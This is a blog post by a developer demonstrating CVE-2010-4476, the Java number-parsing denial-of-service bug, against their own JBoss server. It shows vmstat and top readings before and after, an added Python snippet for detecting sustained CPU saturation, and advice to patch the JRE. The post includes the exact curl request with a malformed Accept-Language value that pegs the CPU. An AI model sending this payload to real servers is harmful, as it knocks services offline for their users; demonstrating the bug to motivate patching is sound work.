About Me

Working as Technical Lead in CollabNET software private limited.

Friday 11 February, 2011

DoS vulnerability in all Java servers, just published as CVE-2010-4476

Oracle has published a fix for this here.

I tested this bug on my JBoss server and watched the CPU utilization climb. I'm excited about this because I had just started looking at vmstat and top output after yesterday's learning about them; both commands report exactly these performance details.

Here is the initial "vmstat 2" output while a plain JBoss process is running. You can see the 'us' column doesn't go beyond 6. The 'us' column is simply the time spent running non-kernel (user) code, which is what reflects the application's CPU utilization.

[prakash@cu255 CTF5.4.1]$ vmstat 2
procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
r b swpd free buff cache si so bi bo in cs us sy id wa st
1 0 68444 168692 243820 747388 0 1 4 36 19 4 1 1 99 0 0
0 0 68444 168692 243820 747388 0 0 0 0 1113 561 0 0 100 0 0
1 0 68444 168692 243820 747388 0 0 0 0 1107 559 0 0 100 0 0
1 0 68444 162988 243820 747388 0 0 0 68 1115 528 33 2 65 0 0
0 0 68444 162988 243820 747388 0 0 0 0 1112 567 0 1 99 0 0
0 0 68444 162864 243820 747392 0 0 0 92 1117 563 0 0 99 0 0
0 0 68444 162864 243820 747392 0 0 0 98 1125 553 0 0 100 0 0
0 0 68444 162864 243820 747392 0 0 0 0 1115 575 0 1 98 0 0
0 0 68444 162864 243820 747392 0 0 0 60 1108 552 0 0 100 0 0
0 0 68444 162864 243820 747392 0 0 0 0 1120 575 0 0 100 0 0
0 0 68444 162864 243820 747392 0 0 0 60 1107 551 0 1 99 0 0
1 0 68444 162864 243820 747392 0 0 0 14 1120 570 0 0 100 0 0
1 0 68444 162864 243820 747392 0 0 0 0 1112 558 0 0 99 0 0
0 0 68444 162864 243824 747392 0 0 0 76 1109 561 0 1 99 0 0
0 0 68444 162864 243824 747392 0 0 0 0 1116 580 0 0 100 0 0
0 0 68444 162864 243824 747392 0 0 0 68 1113 562 0 0 100 0 0
0 0 68444 162864 243824 747392 0 0 0 6 1122 582 0 1 99 0 0
0 0 68444 162864 243824 747392 0 0 0 0 1102 541 0 0 100 0 0
1 0 68444 162484 243824 747392 0 0 0 86 1120 725 2 2 96 0 0
0 0 68444 162484 243824 747392 0 0 0 0 1108 570 0 0 100 0 0
0 0 68444 162484 243824 747392 0 0 0 72 1109 562 0 0 100 0 0
0 0 68444 162484 243824 747392 0 0 0 0 1120 576 0 1 99 0 0
0 0 68444 162484 243824 747428 0 0 0 16 1107 555 0 0 100 0 0
0 0 68444 161864 243824 747432 0 0 0 510 1187 657 6 5 89 0 0


Now, from another terminal, I send the request that triggers the vulnerability using curl:

curl -H "Accept-Language: en-us;q=2.2250738585072012e-308" http://${HTTP_HOST}/requested_page

Here you can see how much the 'us' column increased: it went up to 100%. This pegs my CPU completely.

procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
r b swpd free buff cache si so bi bo in cs us sy id wa st
2 0 68444 161740 243856 747508 0 0 0 80 1108 592 99 1 0 0 0
1 0 68444 161740 243856 747508 0 0 0 0 1102 579 98 2 0 0 0
1 0 68444 161740 243856 747508 0 0 0 0 1108 569 99 1 0 0 0
1 0 68444 161740 243856 747508 0 0 0 60 1103 571 98 2 0 0 0
1 0 68444 161740 243856 747508 0 0 0 0 1108 571 99 1 0 0 0
1 0 68444 161740 243856 747512 0 0 0 94 1107 595 99 1 0 0 0
1 0 68444 161740 243856 747512 0 0 0 48 1085 544 99 1 0 0 0
1 0 68444 161740 243856 747512 0 0 0 8 1111 639 99 1 0 0 0
1 0 68444 161740 243856 747516 0 0 0 92 1102 541 99 1 0 0 0
1 0 68444 161740 243856 747516 0 0 0 0 1114 577 99 1 0 0 0
1 0 68444 161740 243856 747520 0 0 0 36 1116 596 98 2 0 0 0
1 0 68444 161740 243860 747528 0 0 0 124 1106 578 99 1 0 0 0
1 0 68444 161740 243860 747528 0 0 0 0 1107 585 98 2 0 0 0
1 0 68444 161740 243860 747528 0 0 0 72 1100 569 99 1 0 0 0
2 0 68444 161740 243860 747528 0 0 0 0 1112 591 99 1 0 0 0
1 0 68444 161740 243860 747528 0 0 0 0 1101 576 99 1 0 0 0
1 0 68444 161740 243860 747532 0 0 0 86 1119 575 99 1 0 0 0
1 0 68444 161740 243860 747532 0 0 0 0 1102 561 99 1 0 0 0
1 0 68444 161740 243860 747532 0 0 0 82 1109 578 99 1 0 0 0
1 0 68444 161740 243860 747532 0 0 0 0 1108 574 98 2 0 0 0
1 0 68444 161740 243860 747532 0 0 0 0 1099 589 100 0 0 0 0
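To turn the vmstat observation above into a check that can be automated, here is an added example (not code from the original post) that parses vmstat output by its header and flags only sustained runs of high 'us', so a single busy sample like the 33 in the first capture is not mistaken for a spinning thread. The sample rows are copied from the two captures above.

```python
"""Detect sustained user-CPU saturation in `vmstat 2` output.
Added example, not code from the original post. Sample rows below
are copied from the post's two vmstat captures (before/after)."""

VMSTAT_BEFORE = """\
procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
 r  b   swpd   free   buff  cache   si   so    bi    bo   in   cs us sy id wa st
 1  0  68444 168692 243820 747388    0    1     4    36   19    4  1  1 99  0  0
 1  0  68444 162988 243820 747388    0    0     0    68 1115  528 33  2 65  0  0
 0  0  68444 162988 243820 747388    0    0     0     0 1112  567  0  1 99  0  0
 0  0  68444 161864 243824 747432    0    0     0   510 1187  657  6  5 89  0  0
"""

VMSTAT_AFTER = """\
procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
 r  b   swpd   free   buff  cache   si   so    bi    bo   in   cs us sy id wa st
 2  0  68444 161740 243856 747508    0    0     0    80 1108  592 99  1  0  0  0
 1  0  68444 161740 243856 747508    0    0     0     0 1102  579 98  2  0  0  0
 1  0  68444 161740 243856 747508    0    0     0     0 1108  569 99  1  0  0  0
 1  0  68444 161740 243856 747512    0    0     0    94 1107  595 99  1  0  0  0
"""

def parse_vmstat(text):
    """Return one dict per sample row, keyed by vmstat column name."""
    header, rows = None, []
    for line in text.splitlines():
        fields = line.split()
        # The group banner ("procs ... -----cpu------") has no 'us' field;
        # the column-name line that follows it does, so use it as the header.
        if "us" in fields and "id" in fields:
            header = fields
        elif header and len(fields) == len(header) and fields[0].isdigit():
            rows.append(dict(zip(header, map(int, fields))))
    return rows

def saturated_runs(rows, threshold=90, min_samples=3):
    """Return (start_index, length) for every run of at least `min_samples`
    consecutive samples whose 'us' (non-kernel CPU time) >= threshold.
    A lone hot sample, e.g. a GC pause or short burst, is ignored."""
    runs, start = [], None
    for i, row in enumerate(rows + [None]):  # sentinel closes the final run
        hot = row is not None and row["us"] >= threshold
        if hot and start is None:
            start = i
        elif not hot and start is not None:
            if i - start >= min_samples:
                runs.append((start, i - start))
            start = None
    return runs
```

With `vmstat 2`, a run's length times two gives the seconds the box stayed saturated, which is the number worth alerting on.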


The top command shows the same thing:

top - 11:58:41 up 17 days, 15 min, 4 users, load average: 1.05, 1.09, 1.00
Tasks: 123 total, 3 running, 119 sleeping, 0 stopped, 1 zombie
Cpu(s): 98.7%us, 1.0%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.3%si, 0.0%st
Mem: 2059588k total, 1936104k used, 123484k free, 244512k buffers
Swap: 2096472k total, 68432k used, 2028040k free, 760124k cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
28975 prakash 21 0 1428m 528m 16m S 99.9 26.3 20:59.60 /usr/java/jdk1.6.0_18//bin/java -Xms1024m -Xmx1024m -XX:MaxPermSize=256m -server -XX:+HeapDumpOn
29768 prakash 21 0 506m 77m 9100 S 0.3 3.8 0:03.08 /usr/java/jdk1.6.0_18//bin/java -Xms1024m -Xmx1024m -XX:MaxPermSize=256m -server -XX:+HeapDumpOn
10063 prakash 15 0 123m 2812 1648 S 0.0 0.1 0:00.20 /usr/sbin/httpd

You can see the %CPU of the JBoss process on my server box went up to 99.9%. So it's good to have this patch applied to the JRE version the server uses.
